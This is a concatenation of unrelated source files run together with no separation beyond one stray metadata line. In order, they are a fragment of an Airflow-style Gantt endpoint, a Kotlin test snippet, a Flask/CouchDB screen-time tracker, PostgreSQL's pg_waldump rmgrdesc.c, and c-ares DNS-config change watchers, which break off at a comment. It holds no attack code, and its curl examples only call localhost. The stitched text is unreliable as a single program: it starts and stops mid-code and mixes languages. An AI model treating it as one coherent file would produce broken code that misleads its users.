        TaskInstanceHistory.end_date.label("end_date"),
    ).where(
        TaskInstanceHistory.dag_id == dag_id,
        TaskInstanceHistory.run_id == run_id,
        TaskInstanceHistory.map_index == -1,
    )

    combined = union_all(current_tis, history_tis).subquery()
    # Stable ordering: group tries of the same task together, oldest first.
    query = select(combined).order_by(combined.c.task_id, combined.c.try_number)

    results = session.execute(query).fetchall()

    if not results:
        raise HTTPException(
            status.HTTP_404_NOT_FOUND,
            f"No task instances for dag_id={dag_id} run_id={run_id}",
        )

    task_instances = [
        GanttTaskInstance(
            task_id=row.task_id,
            task_display_name=row.task_display_name,
            try_number=row.try_number,
            state=row.state,
            start_date=row.start_date,
            end_date=row.end_date,
        )
        for row in results
    ]
    return GanttResponse(dag_id=dag_id, run_id=run_id, task_instances=task_instances)
fun foo() {}
fun test() {
fo<caret>o()
} | kotlin | github | https://github.com/JetBrains/kotlin | analysis/analysis-api/testData/danglingFileReferenceResolve/functionSameFile.kt |
#!/usr/bin/env python
from flask import Flask, request
import couchdb, json, datetime
app = Flask(__name__)
''' *** List of accessible api urls ***
***NOTE: until Akash finishes user authentication/security, <string:id> will be the name of the user
1. '/' is a get request that tests accessibility to the flask server
2. '/view/' is a get request that returns all the documents (with _id = 'id') in the database
3. '/get/<string:userid>/' is a get request that returns all of the information stored in the database for the user identified by userid, including goals, _id, _rev, etc.
4. '/getapps/<string:userid>/' is a get request that returns only the application data dictionary
5. '/newuser/<string:userid>/' is a put request that creates a new user
6. '/app/<string:userid>/<string:app>' is open to both PUT and DELETE requests
a. the PUT request places that app in the database if not already present, otherwise does nothing to prevent overriding data that may exist
b. the DELETE request removes the app from the database if present
7. '/getgoal/<string:userid>/' is a get request that retrieves the Daily and Weekly Goals from the server
8. '/newgoal/<string:userid>/<int:daily>/<int:weekly>/' is a put requests that can be used to set new goals
9. '/usage/<string:userid>/' is a put request that takes in json usage data and if that app does not yet exist, creates it in the database, and then updates the current day to reflect the json usage data sent by the put request
Database Structure - indentation below indicates hierarchy
** Inside each document is a dictionary of dictionaries. **
Couchdb Server
-> database userid
-> user titled documents within database
-> _id
-> _rev
-> Appdata
-> Total
-> S : value
-> M : value
-> T : value
-> W : value
-> R : value
-> F : value
-> Tot : value
-> Repeat for each app
-> Goals
-> Daily : value
-> Weekly : value
'''
server = couchdb.Server()
# Hard-coded database name: all user documents live in the 'test' database.
db = server['test']
headers = {'Content-Type': 'application/json'}
# Template of per-day usage counters; 'Tot' holds the derived weekly total.
# NOTE(review): this dict is assigned by reference when users/apps are
# created; handlers re-fetch documents before mutating, so the template
# appears to stay zeroed, but copying (dict(Weekly)) would be safer — confirm.
Weekly = {'S': 0, 'M': 0, 'T': 0, 'W': 0, 'R': 0, 'F': 0, 'Sa': 0, 'Tot': 0}
#Weekly Time holders for each app
Goals = {'Daily': 24, 'Weekly': 150}
#make goals unreachable so notifications have to be set first
def dayToIndex(day):
    """Map an abbreviated weekday name ('Mon'..'Sun') to its database key.

    Returns the single/double-letter day key used throughout the Appdata
    dictionaries, or the string 'nothing' for unrecognized input.
    """
    day_codes = {
        'Mon': 'M',
        'Tue': 'T',
        'Wed': 'W',
        'Thu': 'R',
        'Fri': 'F',
        'Sat': 'Sa',
        'Sun': 'S',
    }
    return day_codes.get(day, "nothing")
def appTotal(Appdata):
    """Recompute every derived total in an Appdata mapping, in place.

    Appdata maps app names to per-day hour counters keyed
    'S','M','T','W','R','F','Sa' plus a derived 'Tot'; the special 'Total'
    entry aggregates usage across all apps. Returns the mutated Appdata.
    """
    days = ['S', 'M', 'T', 'W', 'R', 'F', 'Sa']

    # Per-app weekly totals.
    for app, data in Appdata.items():
        if app != 'Total':
            data['Tot'] = sum(data[day] for day in days)

    # Cross-app totals per day plus the overall weekly total.
    weekly = 0
    for day in days:
        # BUG FIX: the original summed data[day] over *all* entries,
        # including the 'Total' row itself, so each subsequent call
        # double-counted the aggregate. Exclude 'Total' from the sum.
        today = sum(data[day] for app, data in Appdata.items() if app != 'Total')
        Appdata['Total'][day] = today
        weekly += today
    Appdata['Total']['Tot'] = weekly
    return Appdata
@app.route('/')
def welcome():
    """Simple reachability check for the Flask server."""
    greeting = "Welcome to Focus" + "\n"
    return greeting
@app.route('/view/', methods = ['GET'])
#curl -X GET http://localhost:5000/view/
def getDocs():
    """Dump the database's _all_docs index as JSON."""
    all_docs = db.get('_all_docs')
    return json.dumps(all_docs) + "\n"
@app.route('/get/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/get/<userid>/
def getName(userid):
    """Return the full stored document for userid with usage totals refreshed."""
    if userid not in db:
        return "User not in database"
    # Refresh derived totals before serving the document.
    doc = db.get(userid)
    doc['Appdata'] = appTotal(doc['Appdata'])
    db[userid] = doc
    return json.dumps(db.get(userid)) + "\n"
@app.route('/getapps/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/get/<userid>/
def getApps(userid):
    """Return only the Appdata dictionary for userid, totals refreshed."""
    if userid not in db:
        return "User not in database"
    # Refresh derived totals before serving the app data.
    doc = db.get(userid)
    doc['Appdata'] = appTotal(doc['Appdata'])
    db[userid] = doc
    return json.dumps(db.get(userid)['Appdata']) + "\n"
@app.route('/newuser/<string:userid>/', methods = ['PUT'])
#curl -X PUT http://localhost:5000/newuser/<userid>/
def newUser(userid):
    """Create a user document with empty usage data and the default goals."""
    if userid in db:
        return userid + " already in db!" + "\n"
    new_doc = {'userid': userid, 'Appdata': {'Total': Weekly}, 'Goals': Goals}
    db[userid] = new_doc
    # Confirm the write landed before reporting success.
    if userid not in db:
        return "Failed to insert"
    return "Successfully inserted " + userid + "\n"
@app.route('/app/<string:userid>/<string:app>/', methods = ['PUT','DELETE'])
def App(userid, app):
    """Register (PUT) or remove (DELETE) an app in the user's Appdata."""
    doc = db.get(userid)
    apps = doc['Appdata']
    if request.method == "PUT":
        #curl -X PUT http://localhost:5000/app/<userid>/<app>/
        if app in apps:
            return app + " already in Appdata" + "\n"
        apps[app] = Weekly
        db[userid] = doc
        return "Successfully inserted " + app + "\n"
    elif request.method == "DELETE":
        #curl -X DELETE http://localhost:5000/app/<userid>/<app>/
        if app not in apps:
            return app + " not in Appdata" + "\n"
        del apps[app]
        db[userid] = doc
        return "Successfully deleted " + app + "\n"
@app.route('/getgoal/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/getgoal/<userid>/
def getGoal(userid):
    """Report the stored daily and weekly usage goals for userid."""
    goals = db.get(userid)['Goals']
    return ("Daily Goal is : " + str(goals['Daily']) + "\n" +
            "Weekly Goal is : " + str(goals['Weekly']) + "\n")
@app.route('/newgoal/<string:userid>/<int:daily>/<int:weekly>/', methods = ['PUT'])
#curl -X PUT http://localhost:5000/newgoal/<userid>/<daily>/<weekly>/
def newGoal(userid, daily, weekly):
    """Overwrite the user's daily and weekly goals with the given values."""
    doc = db.get(userid)
    doc['Goals']['Daily'] = daily
    doc['Goals']['Weekly'] = weekly
    db[userid] = doc
    return f"New Daily is: {daily}\nNew Weekly is: {weekly}\n"
@app.route('/compare/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/compare/<userid>
def checker(userid):
    """Compare the user's usage totals against their daily/weekly goals.

    Returns a human-readable report of which limits (if any) are exceeded.
    """
    #https://www.tutorialspoint.com/python/time_strftime.htm
    now = datetime.datetime.now()
    day = now.strftime("%a")  # current day-of-week abbreviation, e.g. "Mon"
    doc = db.get(userid)
    data = doc['Appdata']['Total']
    w_excess = data['Tot'] - doc['Goals']['Weekly']
    today_index = dayToIndex(day)
    d_excess = data[today_index] - doc['Goals']['Daily']
    if w_excess > 0 and d_excess > 0:
        # BUG FIX: d_excess is an int and must be wrapped in str() before
        # concatenation; the original raised TypeError on this branch.
        return "Weekly limit exceeded by " + str(w_excess) + "\n" + \
               "Daily limit exceeded by " + str(d_excess) + "\n"
    elif d_excess > 0:
        # BUG FIX: same missing str() as above.
        return "Daily limit exceeded by " + str(d_excess) + "\n"
    elif w_excess > 0:
        return "Weekly limit exceeded by " + str(w_excess) + "\n"
    else:
        return "Daily Time = " + str(data[today_index]) + "\n" + \
               "Weekly Time = " + str(data['Tot']) + "\n" + \
               "No goals exceeded! Good job not procrastinating!" + "\n"
@app.route('/usage/<string:userid>/', methods = ['PUT'])
# curl -H "Content-type: application/json" -X PUT http://127.0.0.1:5000/usage/Byron/ -d '{"Instagram": 5}'
def takeJson(userid):
    """Record today's usage hours for each app in the JSON payload.

    Payload shape: {"<app name>": <hours>, ...}. Apps not yet registered
    are inserted first, then today's counter is overwritten with the
    submitted value.
    """
    now = datetime.datetime.now()
    day = now.strftime("%a")  # gives current day of week abbrev
    today_index = dayToIndex(day)  # converts to the day key used in the database
    doc = db.get(userid)
    jdata = json.loads(request.data)  # incoming JSON body as a dict
    for app_name in jdata:
        # BUG FIX: membership must be checked against the Appdata dict, not
        # the top-level document (whose keys are userid/Appdata/Goals/_id/
        # _rev); the original check forced a redundant App() call and
        # re-fetch on every iteration.
        if app_name not in doc['Appdata']:
            App(userid, app_name)     # registers the app with zeroed counters
            doc = db.get(userid)      # re-fetch to pick up the insertion
        index = str(app_name)
        doc['Appdata'][index][today_index] = jdata[index]
        db[userid] = doc
    return "Hello " + str(jdata) + "\n"  # confirmation that the data was received
if __name__ == '__main__':
    # Development settings: debug mode on and bound to all interfaces.
    # Not suitable for production deployment.
    app.debug = True
    app.run(host='0.0.0.0')
/*
* rmgrdesc.c
*
* pg_waldump resource managers definition
*
* src/bin/pg_waldump/rmgrdesc.c
*/
#define FRONTEND 1
#include "postgres.h"
#include "access/brin_xlog.h"
#include "access/clog.h"
#include "access/commit_ts.h"
#include "access/generic_xlog.h"
#include "access/ginxlog.h"
#include "access/gistxlog.h"
#include "access/hash_xlog.h"
#include "access/heapam_xlog.h"
#include "access/multixact.h"
#include "access/nbtxlog.h"
#include "access/rmgr.h"
#include "access/spgxlog.h"
#include "access/xact.h"
#include "access/xlog_internal.h"
#include "catalog/storage_xlog.h"
#include "commands/dbcommands_xlog.h"
#include "commands/sequence_xlog.h"
#include "commands/tablespace.h"
#include "replication/message.h"
#include "replication/origin.h"
#include "rmgrdesc.h"
#include "storage/standbydefs.h"
#include "utils/relmapper.h"
/* Expand each rmgrlist.h entry into a {name, desc, identify} descriptor. */
#define PG_RMGR(symname,name,redo,desc,identify,startup,cleanup,mask,decode) \
	{ name, desc, identify},

static const RmgrDescData RmgrDescTable[RM_N_BUILTIN_IDS] = {
#include "access/rmgrlist.h"
};

/*
 * Descriptors for custom (extension-defined) resource manager IDs are built
 * lazily — see initialize_custom_rmgrs() below.
 */
#define CUSTOM_NUMERIC_NAME_LEN sizeof("custom###")

static char CustomNumericNames[RM_N_CUSTOM_IDS][CUSTOM_NUMERIC_NAME_LEN] = {0};
static RmgrDescData CustomRmgrDesc[RM_N_CUSTOM_IDS] = {0};
static bool CustomRmgrDescInitialized = false;
/*
 * No information on custom resource managers; just print the ID.
 */
static void
default_desc(StringInfo buf, XLogReaderState *record)
{
	appendStringInfo(buf, "rmid: %d", XLogRecGetRmid(record));
}
/*
 * No information on custom resource managers; just return NULL and let the
 * caller handle it.
 */
static const char *
default_identify(uint8 info)
{
	return NULL;
}
/*
* We are unable to get the real name of a custom rmgr because the module is
* not loaded. Generate a table of rmgrs with numeric names of the form
* "custom###", where "###" is the 3-digit resource manager ID.
*/
static void
initialize_custom_rmgrs(void)
{
for (int i = 0; i < RM_N_CUSTOM_IDS; i++)
{
snprintf(CustomNumericNames[i], CUSTOM_NUMERIC_NAME_LEN,
"custom%03d", i + RM_MIN_CUSTOM_ID);
CustomRmgrDesc[i].rm_name = CustomNumericNames[i];
CustomRmgrDesc[i].rm_desc = default_desc;
CustomRmgrDesc[i].rm_identify = default_identify;
}
CustomRmgrDescInitialized = true;
}
/*
 * Look up the descriptor for a resource manager ID.  Built-in IDs come from
 * the static table; custom IDs get lazily-built placeholder entries.
 */
const RmgrDescData *
GetRmgrDesc(RmgrId rmid)
{
	Assert(RmgrIdIsValid(rmid));

	if (!RmgrIdIsBuiltin(rmid))
	{
		if (!CustomRmgrDescInitialized)
			initialize_custom_rmgrs();
		return &CustomRmgrDesc[rmid - RM_MIN_CUSTOM_ID];
	}

	return &RmgrDescTable[rmid];
}
/* MIT License
*
* Copyright (c) 2024 Brad House
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*
* SPDX-License-Identifier: MIT
*/
#include "ares_private.h"
#include "ares_event.h"
#if defined(__ANDROID__) && defined(CARES_THREADS)
/* Android: no supported mechanism for watching DNS configuration changes,
 * so initialization always reports "not implemented". */
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
                                        ares_event_thread_t *e)
{
  (void)configchg;
  (void)e;

  /* No ability */
  return ARES_ENOTIMP;
}
/* Android: nothing was allocated by init, so destroy is a no-op. */
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
  /* No-op */
  (void)configchg;
}
#elif defined(__linux__) && defined(CARES_THREADS)
# include <sys/inotify.h>
/* Linux implementation state: a non-blocking inotify descriptor watching
 * /etc, plus the event thread it is registered with. */
struct ares_event_configchg {
  int                  inotify_fd; /* inotify descriptor (IN_NONBLOCK) */
  ares_event_thread_t *e;          /* owning event thread */
};
/* Stop monitoring for configuration changes.  Deregistering the fd from the
 * event system triggers ares_event_configchg_free() for the real teardown. */
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
  if (configchg == NULL) {
    return; /* LCOV_EXCL_LINE: DefensiveCoding */
  }

  /* Tell event system to stop monitoring for changes. This will cause the
   * cleanup to be called */
  ares_event_update(NULL, configchg->e, ARES_EVENT_FLAG_NONE, NULL,
                    configchg->inotify_fd, NULL, NULL, NULL);
}
/* Cleanup callback invoked by the event system once the fd is deregistered:
 * close the inotify descriptor and release the state struct. */
static void ares_event_configchg_free(void *data)
{
  ares_event_configchg_t *configchg = data;
  if (configchg == NULL) {
    return; /* LCOV_EXCL_LINE: DefensiveCoding */
  }

  if (configchg->inotify_fd >= 0) {
    close(configchg->inotify_fd);
    configchg->inotify_fd = -1;
  }

  ares_free(configchg);
}
/* Read callback for the inotify descriptor: drain all pending events and
 * trigger a channel reinit if resolv.conf or nsswitch.conf changed. */
static void ares_event_configchg_cb(ares_event_thread_t *e, ares_socket_t fd,
                                    void *data, ares_event_flags_t flags)
{
  const ares_event_configchg_t *configchg = data;

  /* Some systems cannot read integer variables if they are not
   * properly aligned. On other systems, incorrect alignment may
   * decrease performance. Hence, the buffer used for reading from
   * the inotify file descriptor should have the same alignment as
   * struct inotify_event. */
  unsigned char buf[4096]
    __attribute__((aligned(__alignof__(struct inotify_event))));
  const struct inotify_event *event;
  ssize_t                     len;
  ares_bool_t                 triggered = ARES_FALSE;

  (void)fd;
  (void)flags;

  while (1) {
    const unsigned char *ptr;

    len = read(configchg->inotify_fd, buf, sizeof(buf));
    if (len <= 0) {
      break;
    }

    /* Loop over all events in the buffer. Says kernel will check the buffer
     * size provided, so I assume it won't ever return partial events. */
    /* NOTE: the loop increment uses event->len, which is set by the loop
     * body before the increment first runs. */
    for (ptr = buf; ptr < buf + len;
         ptr += sizeof(struct inotify_event) + event->len) {
      event = (const struct inotify_event *)((const void *)ptr);

      if (event->len == 0 || ares_strlen(event->name) == 0) {
        continue;
      }

      if (ares_strcaseeq(event->name, "resolv.conf") ||
          ares_strcaseeq(event->name, "nsswitch.conf")) {
        triggered = ARES_TRUE;
      }
    }
  }

  /* Only process after all events are read. No need to process more often as
   * we don't want to reload the config back to back */
  if (triggered) {
    ares_reinit(e->channel);
  }
}
/* Linux: set up an inotify watch on /etc for resolv.conf/nsswitch.conf
 * changes and register it with the event thread.  On success *configchg is
 * populated; on failure all partially-created state is released. */
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
                                        ares_event_thread_t *e)
{
  ares_status_t           status = ARES_SUCCESS;
  ares_event_configchg_t *c;

  (void)e;

  /* Not used by this implementation */
  *configchg = NULL;

  c = ares_malloc_zero(sizeof(*c));
  if (c == NULL) {
    return ARES_ENOMEM; /* LCOV_EXCL_LINE: OutOfMemory */
  }

  c->e          = e;
  c->inotify_fd = inotify_init1(IN_NONBLOCK | IN_CLOEXEC);
  if (c->inotify_fd == -1) {
    status = ARES_ESERVFAIL; /* LCOV_EXCL_LINE: UntestablePath */
    goto done;               /* LCOV_EXCL_LINE: UntestablePath */
  }

  /* We need to monitor /etc/resolv.conf, /etc/nsswitch.conf */
  if (inotify_add_watch(c->inotify_fd, "/etc",
                        IN_CREATE | IN_MODIFY | IN_MOVED_TO | IN_ONLYDIR) ==
      -1) {
    status = ARES_ESERVFAIL; /* LCOV_EXCL_LINE: UntestablePath */
    goto done;               /* LCOV_EXCL_LINE: UntestablePath */
  }

  /* Register the fd for read events; the event system owns cleanup via
   * ares_event_configchg_free(). */
  status =
    ares_event_update(NULL, e, ARES_EVENT_FLAG_READ, ares_event_configchg_cb,
                      c->inotify_fd, c, ares_event_configchg_free, NULL);

done:
  if (status != ARES_SUCCESS) {
    ares_event_configchg_free(c);
  } else {
    *configchg = c;
  }
  return status;
}
#elif defined(USE_WINSOCK) && defined(CARES_THREADS)
# include <winsock2.h>
# include <iphlpapi.h>
# include <stdio.h>
# include <windows.h>
/* Windows implementation state: an IP-interface-change notification handle
 * plus registry watches on the IPv4/IPv6 TCPIP interface keys. */
struct ares_event_configchg {
  HANDLE               ifchg_hnd;    /* NotifyIpInterfaceChange handle */
  HKEY                 regip4;       /* Tcpip\Parameters\Interfaces key */
  HANDLE               regip4_event; /* event signaled on IPv4 key change */
  HANDLE               regip4_wait;  /* RegisterWaitForSingleObject handle */
  HKEY                 regip6;       /* Tcpip6\Parameters\Interfaces key */
  HANDLE               regip6_event; /* event signaled on IPv6 key change */
  HANDLE               regip6_wait;  /* RegisterWaitForSingleObject handle */
  ares_event_thread_t *e;            /* owning event thread */
};
/* Tear down all Windows notification resources: the interface-change
 * callback, both registry wait registrations, keys, and events. */
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
  if (configchg == NULL) {
    return;
  }

#  ifdef HAVE_NOTIFYIPINTERFACECHANGE
  if (configchg->ifchg_hnd != NULL) {
    CancelMibChangeNotify2(configchg->ifchg_hnd);
    configchg->ifchg_hnd = NULL;
  }
#  endif

#  ifdef HAVE_REGISTERWAITFORSINGLEOBJECT
  /* Unregister waits before closing the keys/events they reference. */
  if (configchg->regip4_wait != NULL) {
    UnregisterWait(configchg->regip4_wait);
    configchg->regip4_wait = NULL;
  }

  if (configchg->regip6_wait != NULL) {
    UnregisterWait(configchg->regip6_wait);
    configchg->regip6_wait = NULL;
  }

  if (configchg->regip4 != NULL) {
    RegCloseKey(configchg->regip4);
    configchg->regip4 = NULL;
  }

  if (configchg->regip6 != NULL) {
    RegCloseKey(configchg->regip6);
    configchg->regip6 = NULL;
  }

  if (configchg->regip4_event != NULL) {
    CloseHandle(configchg->regip4_event);
    configchg->regip4_event = NULL;
  }

  if (configchg->regip6_event != NULL) {
    CloseHandle(configchg->regip6_event);
    configchg->regip6_event = NULL;
  }
#  endif

  ares_free(configchg);
}
#  ifdef HAVE_NOTIFYIPINTERFACECHANGE
/* Callback from NotifyIpInterfaceChange(): any interface change triggers a
 * full channel reinitialization. */
static void NETIOAPI_API_
  ares_event_configchg_ip_cb(PVOID CallerContext, PMIB_IPINTERFACE_ROW Row,
                             MIB_NOTIFICATION_TYPE NotificationType)
{
  ares_event_configchg_t *configchg = CallerContext;
  (void)Row;
  (void)NotificationType;
  ares_reinit(configchg->e->channel);
}
#  endif
/* (Re-)arm single-shot registry change notifications on both the IPv4 and
 * IPv6 interface keys.  Returns ARES_FALSE if either registration fails. */
static ares_bool_t
  ares_event_configchg_regnotify(ares_event_configchg_t *configchg)
{
#  ifdef HAVE_REGISTERWAITFORSINGLEOBJECT
#    if defined(__WATCOMC__) && !defined(REG_NOTIFY_THREAD_AGNOSTIC)
#      define REG_NOTIFY_THREAD_AGNOSTIC 0x10000000L
#    endif
  DWORD flags = REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET |
                REG_NOTIFY_THREAD_AGNOSTIC;

  if (RegNotifyChangeKeyValue(configchg->regip4, TRUE, flags,
                              configchg->regip4_event, TRUE) != ERROR_SUCCESS) {
    return ARES_FALSE;
  }

  if (RegNotifyChangeKeyValue(configchg->regip6, TRUE, flags,
                              configchg->regip6_event, TRUE) != ERROR_SUCCESS) {
    return ARES_FALSE;
  }
#  else
  (void)configchg;
#  endif

  return ARES_TRUE;
}
/* Wait callback fired when a watched registry key changes: reinitialize the
 * channel, then re-arm both notifications (they are single-shot). */
static VOID CALLBACK ares_event_configchg_reg_cb(PVOID   lpParameter,
                                                 BOOLEAN TimerOrWaitFired)
{
  ares_event_configchg_t *configchg = lpParameter;
  (void)TimerOrWaitFired;

  ares_reinit(configchg->e->channel);

  /* Re-arm, as its single-shot.  However, we don't know which one needs to
   * be re-armed, so we just do both */
  ares_event_configchg_regnotify(configchg);
}
/* Windows: register for IP-interface-change notifications and watch the
 * IPv4/IPv6 TCPIP interface registry keys.  Any failure rolls back all
 * partially-created resources via ares_event_configchg_destroy(). */
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
                                        ares_event_thread_t     *e)
{
  ares_status_t           status = ARES_SUCCESS;
  ares_event_configchg_t *c      = NULL;

  c = ares_malloc_zero(sizeof(**configchg));
  if (c == NULL) {
    return ARES_ENOMEM;
  }

  c->e = e;

#  ifdef HAVE_NOTIFYIPINTERFACECHANGE
  /* NOTE: If a user goes into the control panel and changes the network
   *       adapter DNS addresses manually, this will NOT trigger a notification.
   *       We've also tried listening on NotifyUnicastIpAddressChange(), but
   *       that didn't get triggered either.
   */

  if (NotifyIpInterfaceChange(AF_UNSPEC, ares_event_configchg_ip_cb, c, FALSE,
                              &c->ifchg_hnd) != NO_ERROR) {
    status = ARES_ESERVFAIL;
    goto done;
  }
#  endif

#  ifdef HAVE_REGISTERWAITFORSINGLEOBJECT
  /* Monitor HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces
   * and HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
   * for changes via RegNotifyChangeKeyValue() */
  if (RegOpenKeyExW(
        HKEY_LOCAL_MACHINE,
        L"SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces",
        0, KEY_NOTIFY, &c->regip4) != ERROR_SUCCESS) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  if (RegOpenKeyExW(
        HKEY_LOCAL_MACHINE,
        L"SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces",
        0, KEY_NOTIFY, &c->regip6) != ERROR_SUCCESS) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  c->regip4_event = CreateEvent(NULL, TRUE, FALSE, NULL);
  if (c->regip4_event == NULL) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  c->regip6_event = CreateEvent(NULL, TRUE, FALSE, NULL);
  if (c->regip6_event == NULL) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  /* Route signaled events to the callback on a thread-pool thread. */
  if (!RegisterWaitForSingleObject(&c->regip4_wait, c->regip4_event,
                                   ares_event_configchg_reg_cb, c, INFINITE,
                                   WT_EXECUTEDEFAULT)) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  if (!RegisterWaitForSingleObject(&c->regip6_wait, c->regip6_event,
                                   ares_event_configchg_reg_cb, c, INFINITE,
                                   WT_EXECUTEDEFAULT)) {
    status = ARES_ESERVFAIL;
    goto done;
  }
#  endif

  if (!ares_event_configchg_regnotify(c)) {
    status = ARES_ESERVFAIL;
    goto done;
  }

done:
  if (status != ARES_SUCCESS) {
    ares_event_configchg_destroy(c);
  } else {
    *configchg = c;
  }

  return status;
}
#elif defined(__APPLE__) && defined(CARES_THREADS)
# include <sys/types.h>
# include <unistd.h>
# include <stdbool.h>
# include <notify.h>
# include <dlfcn.h>
# include <fcntl.h>
/* macOS implementation state: the fd/token pair returned by
 * notify_register_file_descriptor() for the DNS-configuration key. */
struct ares_event_configchg {
  int fd;    /* notify(3) read descriptor */
  int token; /* registration token for notify_cancel() */
};
/* macOS: nothing to do here; the event system calls
 * ares_event_configchg_free() when the fd is deregistered. */
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
  (void)configchg;

  /* Cleanup happens automatically */
}
/* Cleanup callback: cancel the notify(3) registration (which also closes
 * its fd) and release the state struct. */
static void ares_event_configchg_free(void *data)
{
  ares_event_configchg_t *configchg = data;
  if (configchg == NULL) {
    return;
  }

  if (configchg->fd >= 0) {
    notify_cancel(configchg->token);
    /* automatically closes fd */
    configchg->fd = -1;
  }

  ares_free(configchg);
}
/* Read callback for the notify(3) descriptor: drain all pending tokens and
 * reinit the channel if our registration's token was among them. */
static void ares_event_configchg_cb(ares_event_thread_t *e, ares_socket_t fd,
                                    void *data, ares_event_flags_t flags)
{
  ares_event_configchg_t *configchg = data;
  ares_bool_t             triggered = ARES_FALSE;

  (void)fd;
  (void)flags;

  while (1) {
    int     t = 0;
    ssize_t len;

    len = read(configchg->fd, &t, sizeof(t));
    if (len < (ssize_t)sizeof(t)) {
      break;
    }

    /* Token is read in network byte order (yeah, docs don't mention this) */
    t = (int)ntohl(t);

    if (t != configchg->token) {
      continue;
    }

    triggered = ARES_TRUE;
  }

  /* Only process after all events are read. No need to process more often as
   * we don't want to reload the config back to back */
  if (triggered) {
    ares_reinit(e->channel);
  }
}
/* macOS: locate the private dns_configuration_notify_key() symbol, register
 * for its notifications via a file descriptor, and hand that fd (set to
 * non-blocking) to the event thread. */
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
                                        ares_event_thread_t     *e)
{
  ares_status_t status                                  = ARES_SUCCESS;
  void         *handle                                  = NULL;
  const char *(*pdns_configuration_notify_key)(void)    = NULL;
  const char   *notify_key                              = NULL;
  int           flags;
  size_t        i;
  const char   *searchlibs[]                            = {
    "/usr/lib/libSystem.dylib",
    "/System/Library/Frameworks/SystemConfiguration.framework/"
    "SystemConfiguration",
    NULL
  };

  *configchg = ares_malloc_zero(sizeof(**configchg));
  if (*configchg == NULL) {
    return ARES_ENOMEM;
  }

  /* Load symbol as it isn't normally public */
  for (i = 0; searchlibs[i] != NULL; i++) {
    handle = dlopen(searchlibs[i], RTLD_LAZY);
    if (handle == NULL) {
      /* Fail, loop! */
      continue;
    }

    pdns_configuration_notify_key =
      (const char *(*)(void))dlsym(handle, "dns_configuration_notify_key");
    if (pdns_configuration_notify_key != NULL) {
      break;
    }

    /* Fail, loop! */
    dlclose(handle);
    handle = NULL;
  }

  if (pdns_configuration_notify_key == NULL) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  notify_key = pdns_configuration_notify_key();
  if (notify_key == NULL) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  if (notify_register_file_descriptor(notify_key, &(*configchg)->fd, 0,
                                      &(*configchg)->token) !=
      NOTIFY_STATUS_OK) {
    status = ARES_ESERVFAIL;
    goto done;
  }

  /* Set file descriptor to non-blocking */
  /* NOTE(review): fcntl() return values are unchecked here — presumably
   * acceptable for a just-created descriptor, but worth confirming. */
  flags = fcntl((*configchg)->fd, F_GETFL, 0);
  fcntl((*configchg)->fd, F_SETFL, flags | O_NONBLOCK);

  /* Register file descriptor with event subsystem */
  status = ares_event_update(NULL, e, ARES_EVENT_FLAG_READ,
                             ares_event_configchg_cb, (*configchg)->fd,
                             *configchg, ares_event_configchg_free, NULL);

done:
  if (status != ARES_SUCCESS) {
    ares_event_configchg_free(*configchg);
    *configchg = NULL;
  }

  if (handle) {
    dlclose(handle);
  }

  return status;
}
#elif defined(HAVE_STAT) && !defined(_WIN32) && defined(CARES_THREADS)
# ifdef HAVE_SYS_TYPES_H
# include <sys/types.h>
# endif
# ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
# endif
/* Snapshot of a watched file's last observed size and modification time. */
typedef struct {
  size_t size;
  time_t mtime;
} fileinfo_t;

/* State for the portable stat()-polling configuration-change watcher. */
struct ares_event_configchg {
  ares_bool_t isup;              /* set to ARES_FALSE to stop the poll thread */
  ares_thread_t *thread;         /* background polling thread */
  ares_htable_strvp_t *filestat; /* path -> fileinfo_t of last observed state */
  ares_thread_mutex_t *lock;     /* guards isup / wake */
  ares_thread_cond_t *wake;      /* signaled on destroy to cut the wait short */
  const char *resolvconf_path;   /* resolv.conf path being monitored */
  ares_event_thread_t *e;        /* owning event thread */
};
/* stat() each platform-relevant resolver config file and compare against the
 * cached fileinfo_t snapshot in \p filestat, updating the cache as it goes.
 *
 * \return ARES_SUCCESS if any file changed size/mtime, appeared, or vanished;
 *         ARES_ENOTFOUND if nothing changed; ARES_ENOMEM on allocation
 *         failure. */
